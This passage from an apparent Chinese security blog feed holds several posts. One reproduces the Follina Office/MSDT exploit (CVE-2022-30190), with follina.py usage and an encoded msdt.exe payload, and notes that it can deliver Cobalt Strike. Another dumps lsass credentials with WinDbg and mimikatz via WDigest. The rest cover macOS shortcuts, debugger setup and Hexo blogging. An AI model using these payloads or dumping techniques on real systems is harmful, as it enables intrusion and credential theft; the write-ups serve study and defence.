或更高版本,并且目标计算机必须 Windows 8 或更高版本运行</p></li><li><p><a href="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/setting-up-a-network-debugging-connection">手动设置 KDNET 网络内核调试</a></p></li></ul><p>接下来我们进行配置,我是用的是最基础的 com 串口方式连接</p><ol><li><p>目标虚拟机设置串口,使用命名的管道要<code>\\.\pipe\</code>前缀,后面的名字可以自己写一个短的好记的</p><p><img src="https://s2.loli.net/2022/09/08/ptucLK1w4MINJGX.jpg" alt="QQ截图20220907182836"></p></li><li><p>目标机器内配置调试参数</p><p>bcdedit 根据 default 生成一个新的启动项,用来调试,其实通过 bcdedit /enum 并没有看到 default 这个名字</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /copy {default} /d "vmdebug"</span><br></pre></td></tr></table></figure><p>已将该项成功复制到 {7985b4ec-581d-11ec-bee9-8214e8b021aa}</p><p>复制一下这个 id,粘贴到真实机的文档里面</p><p>此时重启的话会有多一个启动项选择,但是看不到,需要设置 timeout,让系统停留在启动项的选择界面</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /timeout 10</span><br></pre></td></tr></table></figure><p>设置 timeout 会在启动项选择界面停留 10 秒钟,超过 10 秒钟则进入默认启动项</p><p><img src="https://s2.loli.net/2022/09/08/KlSOPVeMntgiAId.jpg" alt="QQ截图20220907195034"></p><p>重启后从 vmdebug 选项进入,设置 vmdebug 为调试模式,以免影响默认启动方式的系统环境</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /dbgsettings serial baudrate:115200 debugport:2</span><br></pre></td></tr></table></figure><p>注意这个 debugport,就是创建虚拟机串口的端口号,从创建时的截图看,串行端口 2,debugport 应该就是 2,如果不知道。那只能先设置一个,然后连不上的时候再重新输入命令修改串口</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /debug {ID} ON</span><br></pre></td></tr></table></figure><p>ID是从 bcdedit /copy 创建出 vmdebug 后生成的 id,也可以通过 bcdedit /enum 查询</p><p>重启,停在开机启动项</p></li><li><p>使用 windbg 链接</p><p><img src="https://s2.loli.net/2022/09/08/LA3MBqdhDwyebTo.jpg" alt="QQ截图20220907184645"></p><p>如果一直提示 busy,使用 ctrl+break 键中断,87 键键盘需要(FN+Pause),进入调试器</p><p><img src="https://s2.loli.net/2022/09/08/l1E6mjVfdycK75I.jpg" alt="QQ截图20220907195034"></p></li></ol><p>TIP:</p><ol><li>内核调试必须使用双机调试</li><li>windbg preview 比旧版好用</li><li>等系统进入输入密码界面,再 break,之后就会有 lsass 进程</li></ol><h2 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>调试分析</h2><p><strong>命令行参数</strong></p><p><a href="https://www.cnblogs.com/gaochundong/p/windbg_cheat_sheet.html">WinDbg 命令手册</a></p><p><a href="https://bbs.pediy.com/thread-270324.html">windbg使用详解</a></p><ol><li><p>attach内核调试器后,我们需要抓取<code>lsass</code>进程的<code>EPROCESS</code>地址,可以使用如下命令<code>!process 0 0 lsass.exe</code></p><p><img src="https://s2.loli.net/2022/09/08/87GabPLCyzDOvWR.png" alt="截屏2022-09-07 19.55.18"></p></li><li><p>确定<code>EPROCESS</code>地址后(<code>ffff9d01325a7080</code>),我们可以请求将调试会话切换到<code>lsass</code>进程的上下文</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.process /i /p /r ffff9d01325a7080</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/08/SWclqVnfgLioCeU.png" alt="截屏2022-09-07 19.58.19"></p></li><li><p>使用<code>lm</code>命令来确定空间的访问权限</p><p><img src="https://s2.loli.net/2022/09/08/M4z2PwaxrOypDIj.png" alt="截屏2022-09-07 19.58.56"></p></li></ol><p>在开启 wdigest 前通过 mimikatz 导出密码</p><p><img src="https://s2.loli.net/2022/09/09/RfNX8KFEx1oawvH.jpg" alt="QQ截图20220909135851"></p><p>通过修改注册表开启 UseLogonCredential ,查看内存中的变化</p><p><img src="https://s2.loli.net/2022/09/08/lrVumxJvWwPHGIa.png"></p><p>(图片引用自安全客)</p><p>锁屏后等待用户重新登录,然后再导密码就是保存的明文密码了</p><p><img src="https://s2.loli.net/2022/09/09/qDBjCwa3XnfQGMy.png" alt="ssss"></p><p>关于 mimikatz wdigest 模块是如何实现可以看以下两篇分析文章:</p><p><a href="https://xz.aliyun.com/t/8268">探索Mimikatz-第1部分-WDigest</a></p><p><a href="https://www.anquanke.com/post/id/180126">深入分析Mimikatz:WDigest</a></p><p>参考链接</p><p><a href="https://www.anquanke.com/post/id/220991">Windows凭证机制</a></p><p><a href="https://www.anquanke.com/post/id/86928">利用WinDbg本地内核调试器攻陷 Windows 内核</a></p>]]></content>
<summary type="html"><p><img src="https://s2.loli.net/2022/09/08/61wuRfy4nZWcVrB.png"></p>
<p>我们知道在 win10&#x2F;server2012 及以上版本开启 Wdigest 的情况下通过 mimikatz 是拿不到明文密</summary>
<category term="Windows" scheme="https://oceansec.github.io/categories/Windows/"/>
<category term="windows,mimikatz" scheme="https://oceansec.github.io/tags/windows-mimikatz/"/>
</entry>
<entry>
<title>Windows MSDT RCE(CVE-2022-30190)复现</title>
<link href="https://oceansec.github.io/2023/12/05/Windows%20MSDT%20RCE(CVE-2022-30190)%E5%A4%8D%E7%8E%B0/"/>
<id>https://oceansec.github.io/2023/12/05/Windows%20MSDT%20RCE(CVE-2022-30190)%E5%A4%8D%E7%8E%B0/</id>
<published>2023-12-05T02:59:04.850Z</published>
<updated>2022-08-13T12:34:05.510Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"></p><h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><blockquote><p>可利用恶意 Office 文件中的远程模板功能从远程网络服务器获取恶意 HTML 文件,通过微软支持诊断工具(Microsoft Support Diagnostic Tool,MSDT)执行恶意 PowerShell 代码。该漏洞在宏被禁用的情况下,仍然可以调用 MSDT 执行恶意代码。并且当恶意文件另存为 RTF 格式时,还可以通过 Windows 资源管理器中的预览窗格触发此 rce 的调用,无需执行也可以在目标机器上执行任意代码。</p></blockquote><p>利用 RCE 能够在非管理员权限、禁用宏且在 windows defender 开启的情况下绕过防护,达到上线的效果</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">RTF是Rich Text Format的缩写,意即多文本格式。 这是一种类似DOC格式(Word文档)的文件,有很好的兼容性,使用Windows“附件”中的“写字板”就能打开并进行编辑。 使用“写字板”打开一个RTF格式文件时,将看到文件的内容;如果要查看RTF格式文件的源代码,只要使用“记事本”将它打开就行了</span><br></pre></td></tr></table></figure><p>影响版本:</p><blockquote><p>目前难以全面统计该 cve 影响的Office版本,微软官方尚公布该 cve 波及的具体范围。经安天CERT分析人员验证,确认受该 cve 影响的版本如下:</p><p>Microsoft Office 2013 Service Pack 1 (64-bit edition)</p><p>Microsoft Office 2013 Service Pack 1 (32-bit edition)</p><p>Microsoft Office 2016 (64-bit edition)</p><p>Microsoft Office 2016 (32-bit edition)</p><p>Microsoft Office LTSC 2021 for 32-bit edition</p><p>Microsoft Office LTSC 2021 for 64-bit edition</p></blockquote><h2 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h2><p>我这里复现用的版本是:office Microsoft Office LTSC 专业增强版 2021</p><p>Poc:<a href="https://github.com/chvancooten/follina.py">https://github.com/chvancooten/follina.py</a></p><p>提供了很多利用方法</p><p>Usage:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$ python .\follina.py -h</span><br><span class="line">usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]</span><br><span class="line"></span><br><span class="line">options:</span><br><span class="line"> -h, --help show this help message and exit</span><br><span class="line"></span><br><span class="line">Required Arguments:</span><br><span class="line"> -m {command,binary}, --mode {command,binary}</span><br><span class="line"> Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command</span><br><span class="line"></span><br><span class="line">Binary Execution Arguments:</span><br><span class="line"> -b BINARY, --binary BINARY</span><br><span class="line"> The full path of the binary to run. Can be local or remote from an SMB share</span><br><span class="line"></span><br><span class="line">Command Execution Arguments:</span><br><span class="line"> -c COMMAND, --command COMMAND</span><br><span class="line"> The encoded command to execute in "command" mode</span><br><span class="line"></span><br><span class="line">Optional Arguments:</span><br><span class="line"> -t {rtf,docx}, --type {rtf,docx}</span><br><span class="line"> The type of payload to use, can be "docx" or "rtf"</span><br><span class="line"> -u URL, --url URL The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified</span><br><span class="line"> -H HOST, --host HOST The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)</span><br><span class="line"> -P PORT, --port PORT The port to run the HTTP server on, defaults to 80</span><br></pre></td></tr></table></figure><ul><li><p>执行命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python .\follina.py -m <span class="built_in">command</span> -c calc -t docx</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/b255e56ca734f37ba56985cc7d97c00e.png" alt="image-20220606220321985"><br>可以通过 -c 参数指定 cs 的 powershell 代码上线 cs</p></li><li><p>执行二进制文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python follina.py -m binary -b \windows\system32\calc.exe -H 0.0.0.0 -P 8080 -t docx</span><br></pre></td></tr></table></figure></li></ul><p>生成 docx 文档后点击<br><img src="https://img-blog.csdnimg.cn/img_convert/52204d8d2d549cbf29c1076e3f670805.png" alt="image-20220606215023535"></p><h2 id="Poc-分析"><a href="#Poc-分析" class="headerlink" title="Poc 分析"></a>Poc 分析</h2><h3 id="分析-Python-代码"><a href="#分析-Python-代码" class="headerlink" title="分析 Python 代码"></a>分析 Python 代码</h3><p>首先根据 -H -p 参数指定的 IP 和端口生成 payload_url,url 就是生成的 exploit.html 文件位置</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a74a2b4773ae44de7d5444e7a101566c.png" alt="image-20220606110009491"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/79a9bc8b1f3d70ec7d20b0002fffa665.png" alt="image-20220606105230171"></p><p>在上面的代码中可以看到如果指定模式为 command 就会拼接<code>ms-msdt:</code>开头的字符串,然后调用 generate docx 其实就是将 payload_url 拼接到 document.xml-rels.tpl 中然后生成 word 文件</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c8c5bf8230467442fdd4de5472b6a2cd.png" alt="image-20220606105620823"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/532ebc7441d786f8b00d35aa3da95670.png" alt="image-20220606104815928"></p><p>之前搞过 邮 件 钓 鱼 的同学都应该很清除这里的逻辑是向<code>word\_rels\document.xml.rels</code>写一个远程模板地址,<a href="https://blog.csdn.net/q20010619/article/details/121661703">CobaltStrike使用:第三篇使用CS进行用户驱动攻击(钓鱼攻击)</a></p><p>在来看一下这个 exploit.html 的具体内容,可以看到<code>ms-msdt</code>开头的字符串被拼接到了<code><script></code>标签中,然后调整转到这个伪协议</p><p><img src="https://img-blog.csdnimg.cn/img_convert/584e545d58843cb4274b2f59a6d15af1.png" alt="image-20220606110227146"></p><h3 id="ms-msdt-协议"><a href="#ms-msdt-协议" class="headerlink" title="ms-msdt 协议"></a>ms-msdt 协议</h3><p>在注册表中找到,其 command 是<code>"%SystemRoot%\system32\msdt.exe" % 1</code></p><p><img src="https://img-blog.csdnimg.cn/img_convert/72c087a49df08f5404f692fe41ef82f1.png" alt="image-20220606111600611"></p><p>msdt.exe 是微软支持诊断工具,<a href="https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/msdt">官网文档</a></p><p>官网文档中给出了语法参数对照 payload</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msdt.exe /id PCWDiagnostic /skip force /param <span class="string">"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=<span class="subst">$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+')</span>)'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"</span></span><br></pre></td></tr></table></figure><ul><li><code>/id PCWDiagnostic</code>表示运行 PCWDiagnostic 诊断包</li></ul><p>大概意思就是该部分表示要在故障排除阶段运行的脚本,发生故障即触发 payload 中的 powershell 代码</p><h2 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h2><p>禁用<code>MSDT URL</code>协议</p><blockquote><ol><li><p>以管理员身份运行命令提示符</p></li><li><p>备份注册表项后,执行命令:reg export HKEY_CLASSES_ROOT\ms-msdt filename</p></li><li><p>再执行命令:reg delete HKEY_CLASSES_ROOT\ms-msdt /f</p></li></ol></blockquote><p>若需要撤销禁用则用管理员身份打开cmd执行:<code>reg import filename</code></p><blockquote><p>受本次 RCE 影响的Office版本目前不便统计,且暂无官方补丁,由此判断:该漏洞后续被利用的可能性较大。鉴于本次漏洞影响十分广泛且危害较大,安天CERT给出下列建议:</p><ol><li><p>谨慎下载及打开来源不明或内容可疑的文档;</p></li><li><p>关闭资源管理器的文件内容预览功能;</p></li><li><p>更新终端防病毒程序(及)病毒库;</p></li><li><p>禁用ms-msdt功能,并取消对应的rtf文件类型关联。</p></li></ol></blockquote><p><a href="https://xz.aliyun.com/t/11416">Follina Microsoft Office RCE with MS-MSDT Protocol</a></p><p><a href="https://www.antiy.cn/research/notice&report/research_report/20220531.html">Microsoft Office 远程代码执行(CVE-2022-30190)风险提示</a></p><p>公众号:红队蓝军,Windows支持诊断工具(MSDT)远程代码执行(CVE-2022-30190)分析复现_修复</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d717a424deb896a4ca97a7f1f83da1f8.png"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"></p>
<h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></summary>
<category term="钓鱼" scheme="https://oceansec.github.io/categories/%E9%92%93%E9%B1%BC/"/>
<category term="Windows" scheme="https://oceansec.github.io/tags/Windows/"/>
</entry>
<entry>
<title>机械革命z2黑苹果改造计划第三番-macOS键盘快捷键&Win键盘适配</title>
<link href="https://oceansec.github.io/2023/12/05/macOS%E9%94%AE%E7%9B%98%E5%BF%AB%E6%8D%B7%E9%94%AE&Win%E9%94%AE%E7%9B%98%E9%80%82%E9%85%8D/"/>
<id>https://oceansec.github.io/2023/12/05/macOS%E9%94%AE%E7%9B%98%E5%BF%AB%E6%8D%B7%E9%94%AE&Win%E9%94%AE%E7%9B%98%E9%80%82%E9%85%8D/</id>
<published>2023-12-05T02:59:04.848Z</published>
<updated>2023-02-20T10:55:21.700Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="在这里插入图片描述"></p><h1 id="macOS键盘快捷键-amp-Win键盘适配"><a href="#macOS键盘快捷键-amp-Win键盘适配" class="headerlink" title="macOS键盘快捷键&Win键盘适配"></a>macOS键盘快捷键&Win键盘适配</h1><h2 id="键盘区别"><a href="#键盘区别" class="headerlink" title="键盘区别"></a>键盘区别</h2><p>首先下图是苹果妙控键盘无指纹版,官网售价699,穷学生的我是真的买不起</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c22f74bc478a76bda1b4a64997bca02b.png" alt="截屏2023-02-15 15.08.36"></p><p>然后下图是我正在使用的机械键盘ikbc w200 87键版本</p><p><img src="https://img-blog.csdnimg.cn/img_convert/bc11205ab71eb2df4fdd3a20344f54ea.png" alt="截屏2023-02-15 15.20.21"></p><p>可以看出两者在键位排列上的区别主要在于 win/command 键,在macOS中大多数快捷键由 command + 其他键组成,等同于使用win键盘的 win + 其他键位,苹果键盘的option就是win键盘的Alt</p><h2 id="快捷键"><a href="#快捷键" class="headerlink" title="快捷键"></a>快捷键</h2><p>苹果官网也给出了文档:<a href="https://support.apple.com/zh-cn/HT201236">链接</a></p><p>接下来介绍一些macOS的实用快捷键,其实很多快捷键和Windows一样</p><ol><li>command + c:复制 +v 粘贴,注意macOS中没有文件剪切command + x只能用于文字剪切</li><li>先command + c 复制文件,然后 option + command + v 移动文件</li><li>command + 空格:显示或隐藏「聚焦」搜索栏,用过utools的都知道啦,在macOS中也有utools类似工具如:alfred、hapigo</li><li>command + shift + 3/4/5分别代表:全屏/区域/窗口截屏,同时按 ctrl 可以将截图保存为剪贴板(确实难按的过来)</li><li>command + q:退出应用,option + command + esc:强制结束进程</li><li>command + m:当前窗口最小化至程序坞,command + h 隐藏程序</li><li>在macos中选中文件按Enter并不能打开而是重命名</li><li>command + shift + n:新建文件夹</li><li>command + d:复制(win中ctrl+d为删除文件)</li><li>command + delete:删除文件</li><li>Command + 上箭头:打开包含当前文件夹的文件夹<br>Command + 下箭头:打开所选项</li><li>command + 左箭头:文件编辑时移至行首,右箭头移至行尾</li><li>command + F7/F8:音量加减</li><li>scrlk:减少屏幕亮度,pasue:增加屏幕亮度</li><li>caps:中英文切换,按住shift大写</li><li>在文件、图片、视频等一些文件选中按空格键可以快速预览,俗称「一指禅」</li></ol><p><strong>mac终端光标移动的快捷键</strong></p><ul><li>将光标移动到行首:control + a</li><li>将光标移动到行尾:control + e</li><li>清除屏幕:control + l</li><li>搜索以前使用命令:control + r</li><li>清除当前行:control + u</li></ul><h2 id="键盘设置"><a href="#键盘设置" class="headerlink" title="键盘设置"></a>键盘设置</h2><p>在mac键盘中command键紧挨着空格左边,Windows键盘则是中间加了个alt键,不适应的macOS中可以修改:</p><p>系统偏好设置-键盘-更改键盘类型</p><p><img src="https://img-blog.csdnimg.cn/img_convert/8d5dc4701ce18e050bb5b2bf6e7698f6.png" alt="截屏2023-02-15 17.54.58"></p><h2 id="鼠标设置"><a href="#鼠标设置" class="headerlink" title="鼠标设置"></a>鼠标设置</h2><p>还有就是鼠标滚轮方向和Windows是反着的,这点macOS是和触控板一样的,模拟手指滑动,mac的妙控鼠标也是触控的,如果不用触控板的话可以在设置中修改:</p><p>系统偏好设置-鼠标-自然滚动取消</p><p><img src="https://img-blog.csdnimg.cn/img_convert/7fcebca2a5cf61d8bffeadd54627e87a.png" alt="截屏2023-02-15 17.58.32"></p><p>不过有一说一Mac的触控板是真的好用,闲鱼上有二手的妙控鼠标2代在200左右,二手的magic trackpad 1代在250左右,二代都在400左右,真的好贵,还是乖乖用的自己键鼠吧</p><p>因为经常要用到终端,可以将终端添加到访达的服务中,这样在文件夹右击就可以打开终端,十分的方便</p><p><img src="https://img-blog.csdnimg.cn/img_convert/122dc510f8eb792be8029f260e9489a7.png" alt="image-20230215180725792"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/ea467c86b1f925b4bbf8e10866287323.png" alt="截屏2023-02-15 18.04.58"><br><img src="https://img-blog.csdnimg.cn/a2f8e34dc109445eb05ee5f1126aa780.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="在这里插入图片描述"></p>
<h1 id="macOS键盘快捷键-amp-Win键盘适配"><a href=</summary>
<category term="黑苹果" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="黑苹果" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>macos 环境下搭建 windbg 虚拟机双机调试环境</title>
<link href="https://oceansec.github.io/2023/12/05/macos%20%E7%8E%AF%E5%A2%83%E4%B8%8B%E6%90%AD%E5%BB%BA%20windbg%20%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%8F%8C%E6%9C%BA%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83/"/>
<id>https://oceansec.github.io/2023/12/05/macos%20%E7%8E%AF%E5%A2%83%E4%B8%8B%E6%90%AD%E5%BB%BA%20windbg%20%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%8F%8C%E6%9C%BA%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83/</id>
<published>2023-12-05T02:59:04.846Z</published>
<updated>2022-09-19T09:31:09.710Z</updated>
<content type="html"><![CDATA[<p>本次使用将在 macos 环境下搭建 windbg 虚拟机双机调试环境,和 windows 调试略有区别,关于 windows 虚拟机双机调试可以看上一篇文章</p><p>实验环境</p><ul><li>物理机:MacBoob+vmfusion 专业版 12.1.0</li><li>调试机:win10 x64+windbg preview </li><li>目标机器(被调试机):win7 x64</li></ul><p>环境搭建</p><ol><li><p>设置虚拟机串口,首先找到虚拟机所在包</p><p>选择机器右击在 finder 中打开(因为我这里截图按到了 command 键所以变成了打开最新的日志文件)</p><p><img src="https://s2.loli.net/2022/09/19/gtof97WCIwBak3H.png" alt="截屏2022-09-19 11.37.35"></p><p>找到调试机器和目标机器右击显示包内容,找到对应的<code>虚拟机名.vmx</code>文件并打开</p><p><strong>调试机器设置</strong></p><p>删除原有的包含 “serial0 “ 的配置行,替换为以下内容</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">serial0.present = "TRUE"</span><br><span class="line">serial0.fileType = "pipe"</span><br><span class="line">serial0.fileName = "/Users/{name}/com1"</span><br><span class="line">serial0.yieldOnMsrRead = "TRUE"</span><br><span class="line">serial0.tryNoRxLoss = "FALSE"</span><br><span class="line">serial0.pipe.endPoint = "client"</span><br></pre></td></tr></table></figure><p><strong>被调试机器</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">serial0.fileName = "/Users/{name}/com1"</span><br><span class="line">serial0.present = "TRUE"</span><br><span class="line">serial0.fileType = "pipe"</span><br><span class="line">serial0.yieldOnMsrRead = "TRUE"</span><br><span class="line">serial0.startConnected = "TRUE"</span><br></pre></td></tr></table></figure><p>注意:这里 {name} 需要更换为自己的用户名,虚拟机处于关闭或挂起状态才可以修改该配置文件</p></li><li><p><strong>被调试机</strong>设置开启串口,以管理员身份打开 cmd,执行以下命令</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /enum ACTIVE</span><br><span class="line">bcdedit /dbgsettings serial baudrate:115200 debugport:1</span><br><span class="line">bcdedit /copy {current} /d "Windows Debug Entry"</span><br><span class="line">bcdedit /displayorder {current} {上一行的id}</span><br><span class="line">bcdedit /debug {上一行的id} ON</span><br><span class="line">bcdedit -set TESTSIGNING on</span><br><span class="line">bcdedit /dbgsettings</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/19/Aj1Ecg9BUGki6Wz.png" alt="截屏2022-09-19 12.21.32"></p><p><img src="https://s2.loli.net/2022/09/19/vEcyO8SZbj4NwMm.png" alt="截屏2022-09-19 12.22.58"></p><p>命令执行完毕后,重启系统,开机时出现新的启动项即为正常</p><p><img src="https://s2.loli.net/2022/09/19/qhSVdgQr1Uub7ik.png" alt="截屏2022-09-19 16.50.36"></p></li><li><p><strong>调试机器设置</strong></p><p>计算机管理 -> 设备管理器 -> 端口 -> 通信端口 -> 端口设置</p><p>设置位/秒为 115200</p><p><img src="https://s2.loli.net/2022/09/19/6JgjO4nqAdCHe2k.png" alt="截屏2022-09-19 12.27.19"></p></li><li><p>打开 windbg preview</p><p>attach to kernel</p><p><img src="https://s2.loli.net/2022/09/19/Ebj38mir4uMdft7.png" alt="截屏2022-09-19 12.29.59"></p><p>注意此时被调试机处于开机选择启动项界面,选择 windows debug entry</p><p><img src="https://s2.loli.net/2022/09/19/ydc5WoN3LGtT6hO.png" alt="截屏2022-09-19 16.52.26"></p></li></ol><p>之后就可以愉快的调试了</p>]]></content>
<summary type="html"><p>本次使用将在 macos 环境下搭建 windbg 虚拟机双机调试环境,和 windows 调试略有区别,关于 windows 虚拟机双机调试可以看上一篇文章</p>
<p>实验环境</p>
<ul>
<li>物理机:MacBoob+vmfusion 专业版 12.1.0<</summary>
<category term="内网" scheme="https://oceansec.github.io/categories/%E5%86%85%E7%BD%91/"/>
<category term="环境搭建,调试" scheme="https://oceansec.github.io/tags/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA-%E8%B0%83%E8%AF%95/"/>
</entry>
<entry>
<title>Hexo博客搭建部署GitHub</title>
<link href="https://oceansec.github.io/2023/12/05/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E9%83%A8%E7%BD%B2GitHub/"/>
<id>https://oceansec.github.io/2023/12/05/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E9%83%A8%E7%BD%B2GitHub/</id>
<published>2023-12-05T02:59:04.844Z</published>
<updated>2023-02-15T06:50:25.690Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/85078d1b776d429eba18a5bc29b178a9.png" alt="在这里插入图片描述"></p><h1 id="Hexo博客"><a href="#Hexo博客" class="headerlink" title="Hexo博客"></a>Hexo博客</h1><p>Hexo是一个简洁的静态博客页面,使用markdown渲染文件,在本地生产静态文件后可以部署到GitHub上,这样不需要占用自己的域名和服务器,其实我在很早之前就换用了hexo,原来的博客在csdn,<a href="https://oceansec.blog.csdn.net/">oceansec.blog.csdn.net</a>,新博客在GitHub <a href="https://oceansec.github.io/">oceansec.github.io</a>,一直也没去搞篇文章去总结,这篇文章去整理下如何搭建自己的hexo博客</p><p>hexo<a href="https://hexo.io/zh-cn/docs/">官方文档在这</a></p><h2 id="1-安装NodeJS"><a href="#1-安装NodeJS" class="headerlink" title="1.安装NodeJS"></a>1.安装NodeJS</h2><p>首先要知道的是的hexo是就有nodejs的,要安装nodejs,macos安装brew后可以使用以下命令直接安装nodejs</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">brew install node</span><br></pre></td></tr></table></figure><p>安装成功后可以使用<code>node -v</code>命令查看安装版本确认安装成功</p><p><img src="https://img-blog.csdnimg.cn/img_convert/44fdcc1e6f163ff5b8d82ba16a1efd2f.png" alt="截屏2023-02-15 10.40.52"></p><p>未安装brew的,可以使用以下命令去安装</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"</span><br></pre></td></tr></table></figure><h2 id="2-安装git"><a href="#2-安装git" class="headerlink" title="2.安装git"></a>2.安装git</h2><p>macos是自带git工具的,windows可以在官网下载后图形化安装,使用<code>git -version</code>判断安装是否成功,Windows可能需要设置环境变量</p><p>macos也可以使用brew去安装和管理git,安装命令如下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">brew install git</span><br></pre></td></tr></table></figure><h2 id="3-安装Hexo"><a href="#3-安装Hexo" class="headerlink" title="3.安装Hexo"></a>3.安装Hexo</h2><p>选择一个文件夹作为自己博客的目录,在终端中打开,输入以下命令安装hexo</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">npm install -g hexo-cli</span><br></pre></td></tr></table></figure><p>安装后进行初始化操作,会自动在github上下载项目</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hexo init</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/7778750f6f5b6fec7017879c479877ad.png" alt="截屏2023-02-15 10.44.27"></p><p>之后输入<code>hexo g</code>生成静态网页,<code>hexo s</code>启动本地服务器进行测试4</p><p><img src="https://img-blog.csdnimg.cn/img_convert/323eecb783a9453d6cff52f13f1cdee5.png" alt="截屏2023-02-15 10.49.56"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/73ec5d08b18a41561e9da5badbf110e0.png" alt="截屏2023-02-15 10.51.09"></p><p>到这一步博客就在本地搭建完成了,接下来要做的就是可以根据自己的喜好选择博客模版主题</p><h2 id="4-替换主题"><a href="#4-替换主题" class="headerlink" 